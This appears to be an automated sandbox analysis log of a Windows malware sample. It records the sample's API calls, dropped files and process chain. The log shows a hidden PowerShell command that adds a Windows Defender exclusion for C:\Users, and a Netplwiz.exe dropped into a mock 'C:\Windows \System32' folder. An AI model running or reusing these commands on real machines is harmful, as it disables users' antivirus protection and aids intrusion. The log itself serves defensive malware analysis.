Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9A80 NtOpenDirectoryObject,	3_2_00AD9A80
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9A20 NtResumeThread,	3_2_00AD9A20
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9A00 NtProtectVirtualMemory,	3_2_00AD9A00
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9A10 NtQuerySection,	3_2_00AD9A10
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9A50 NtCreateFile,	3_2_00AD9A50
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ADA3B0 NtGetContextThread,	3_2_00ADA3B0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9B00 NtSetValueKey,	3_2_00AD9B00
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD95F0 NtQueryInformationFile,	3_2_00AD95F0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD95D0 NtClose,	3_2_00AD95D0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9520 NtWaitForSingleObject,	3_2_00AD9520
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ADAD30 NtSetContextThread,	3_2_00ADAD30
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9560 NtWriteFile,	3_2_00AD9560
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9540 NtReadFile,	3_2_00AD9540
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD96D0 NtCreateKey,	3_2_00AD96D0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9610 NtEnumerateValueKey,	3_2_00AD9610
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9670 NtQueryInformationProcess,	3_2_00AD9670
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9650 NtQueryValueKey,	3_2_00AD9650
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD97A0 NtUnmapViewOfSection,	3_2_00AD97A0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9780 NtMapViewOfSection,	3_2_00AD9780
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9FE0 NtCreateMutant,	3_2_00AD9FE0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9730 NtQueryVirtualMemory,	3_2_00AD9730
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9710 NtQueryInformationToken,	3_2_00AD9710
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ADA710 NtOpenProcessToken,	3_2_00ADA710
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9760 NtOpenProcess,	3_2_00AD9760
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9770 NtSetInformationFile,	3_2_00AD9770
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ADA770 NtOpenThread,	3_2_00ADA770

Creates files inside the system directory

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041B846	3_2_0041B846
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041CA60	3_2_0041CA60
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00408C4B	3_2_00408C4B
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00408C50	3_2_00408C50
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041B4A3	3_2_0041B4A3
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041CEBD	3_2_0041CEBD
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AC20A0	3_2_00AC20A0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B620A8	3_2_00B620A8
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AAB090	3_2_00AAB090
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B628EC	3_2_00B628EC
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B6E824	3_2_00B6E824
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ABA830	3_2_00ABA830
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00A96800	3_2_00A96800
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B51002	3_2_00B51002
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AB99BF	3_2_00AB99BF
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AB4120	3_2_00AB4120
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00A9F900	3_2_00A9F900
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B622AE	3_2_00B622AE
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B632A9	3_2_00B632A9
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B54AEF	3_2_00B54AEF
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B5E2C5	3_2_00B5E2C5
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ABB236	3_2_00ABB236
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B4FA2B	3_2_00B4FA2B
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ACEBB0	3_2_00ACEBB0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AC138B	3_2_00AC138B
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ABEB9A	3_2_00ABEB9A
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B3EB8A	3_2_00B3EB8A
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AE8BE8	3_2_00AE8BE8
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B423E3	3_2_00B423E3
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B5DBD2	3_2_00B5DBD2
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B503DA	3_2_00B503DA
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ACABD8	3_2_00ACABD8
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B62B28	3_2_00B62B28
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ABA309	3_2_00ABA309
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B5231B	3_2_00B5231B
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ABAB40	3_2_00ABAB40
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B3CB4F	3_2_00B3CB4F
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B54496	3_2_00B54496
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AA841F	3_2_00AA841F
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B5D466	3_2_00B5D466
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ABB477	3_2_00ABB477
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AC65A0	3_2_00AC65A0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AC2581	3_2_00AC2581
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B52D82	3_2_00B52D82
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AAD5E0	3_2_00AAD5E0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B625DD	3_2_00B625DD
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00A90D20	3_2_00A90D20
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B62D07	3_2_00B62D07
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B61D55	3_2_00B61D55
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B41EB6	3_2_00B41EB6
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B62EF7	3_2_00B62EF7
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AB6E30	3_2_00AB6E30
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B5D616	3_2_00B5D616
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AB5600	3_2_00AB5600
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B61FF1	3_2_00B61FF1
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B567E2	3_2_00B567E2
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00B6DFCE	3_2_00B6DFCE
Source: C:\Windows \System32\Netplwiz.exe	Code function: 8_2_00007FF61AD32D20	8_2_00007FF61AD32D20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFA35A81678	13_2_00007FFA35A81678
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFA35A843DC	13_2_00007FFA35A843DC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFA35A81700	13_2_00007FFA35A81700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFA35B57962	13_2_00007FFA35B57962

Source: C:\Users\Public\Citvon\Citvon.exe	Code function: String function: 02208190 appears 45 times
Source: C:\Users\Public\Citvon\Citvon.exe	Code function: String function: 0220A097 appears 42 times
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: String function: 00B25720 appears 38 times
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: String function: 00AED08C appears 39 times
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: String function: 0041A0A0 appears 31 times
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: String function: 00A9B150 appears 154 times

Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Citvon.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Netplwiz.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Netplwiz.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Netplwiz.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Netplwiz.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Netplwiz.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Netplwiz.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Section loaded: nviewlib.dll	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Section loaded: nviewlib.dll	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Section loaded: nviewlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_01

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe 'C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe'
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Process created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\Netplwiz.exe C:\Windows \System32\Netplwiz.exe
Source: C:\Windows \System32\Netplwiz.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Citvon\Citvon.exe 'C:\Users\Public\Citvon\Citvon.exe'
Source: unknown	Process created: C:\Users\Public\Citvon\Citvon.exe 'C:\Users\Public\Citvon\Citvon.exe'
Source: C:\Users\Public\Citvon\Citvon.exe	Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
Source: C:\Users\Public\Citvon\Citvon.exe	Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Process created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Jump to behavior
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\Netplwiz.exe C:\Windows \System32\Netplwiz.exe	Jump to behavior
Source: C:\Windows \System32\Netplwiz.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe	Jump to behavior

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Unpacked PE file: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Source: C:\Users\Public\Citvon\Citvon.exe	Unpacked PE file: 25.2.Citvon.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Source: C:\Users\Public\Citvon\Citvon.exe	Unpacked PE file: 27.2.Citvon.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;

Source: Citvon.exe.0.dr	Static PE information: real checksum: 0xb7705 should be: 0xb5507
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Static PE information: real checksum: 0xb7705 should be: 0xb5507

Source: NETUTILS.dll.6.dr	Static PE information: section name: .xdata
Source: NETUTILS.dll.6.dr	Static PE information: section name: /4
Source: NETUTILS.dll.6.dr	Static PE information: section name: /19
Source: NETUTILS.dll.6.dr	Static PE information: section name: /31
Source: NETUTILS.dll.6.dr	Static PE information: section name: /45
Source: NETUTILS.dll.6.dr	Static PE information: section name: /57
Source: NETUTILS.dll.6.dr	Static PE information: section name: /70
Source: NETUTILS.dll.6.dr	Static PE information: section name: /81
Source: NETUTILS.dll.6.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 0_3_02288222 push 00405E24h; ret	0_3_02288248
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 0_3_02288224 push 00405E24h; ret	0_3_02288248
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 0_3_0228825C push 00405E5Ch; ret	0_3_02288280
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 0_3_022853E8 push eax; ret	0_3_02285424
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 0_3_0228871C push 0040631Ch; ret	0_3_02288740
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 0_3_0228840A push 0040600Ch; ret	0_3_02288430
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 0_3_0228840C push 0040600Ch; ret	0_3_02288430
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 0_3_02289B74 push ecx; mov dword ptr [esp], eax	0_3_02289B75
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 0_3_02287F44 push 00405B69h; ret	0_3_02287F8D
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_004100F9 push ss; ret	3_2_004100FB
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00416216 push edx; ret	3_2_00416219
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0040C303 push edx; ret	3_2_0040C30A
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0040C3CE push FFFFFF97h; iretd	3_2_0040C3D0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041B3B5 push eax; ret	3_2_0041B408
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041B46C push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041B402 push eax; ret	3_2_0041B408
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041B40B push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_004154F1 push ss; retf	3_2_00415683
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00415614 push ss; retf	3_2_00415683
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0040CFD2 push ss; retf	3_2_0040CFD5
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0040EF94 pushad ; iretd	3_2_0040EF95
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AED0D1 push ecx; ret	3_2_00AED0E4
Source: C:\Windows \System32\Netplwiz.exe	Code function: 8_2_613CF021 pushfq ; iretd	8_2_613CF02A
Source: C:\Windows \System32\Netplwiz.exe	Code function: 8_2_613CFD00 pushfq ; ret	8_2_613CFD01
Source: C:\Windows \System32\Netplwiz.exe	Code function: 8_2_613D0DFE push rsp; iretd	8_2_613D0DFF
Source: C:\Users\Public\Citvon\Citvon.exe	Code function: 17_3_022D53E8 push eax; ret	17_3_022D5424
Source: C:\Users\Public\Citvon\Citvon.exe	Code function: 17_3_022DA934 push eax; ret	17_3_022DA970
Source: C:\Users\Public\Citvon\Citvon.exe	Code function: 17_3_022D7F44 push 00405B69h; ret	17_3_022D7F8D
Source: C:\Users\Public\Citvon\Citvon.exe	Code function: 20_3_02208222 push 00405E24h; ret	20_3_02208248
Source: C:\Users\Public\Citvon\Citvon.exe	Code function: 20_3_02208222 push 00405E24h; ret	20_3_02208248
Source: C:\Users\Public\Citvon\Citvon.exe	Code function: 20_3_02208224 push 00405E24h; ret	20_3_02208248

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	File created: C:\Users\Public\Netplwiz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	File created: C:\Users\Public\Citvon\Citvon.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows \System32\Netplwiz.exe	Jump to dropped file
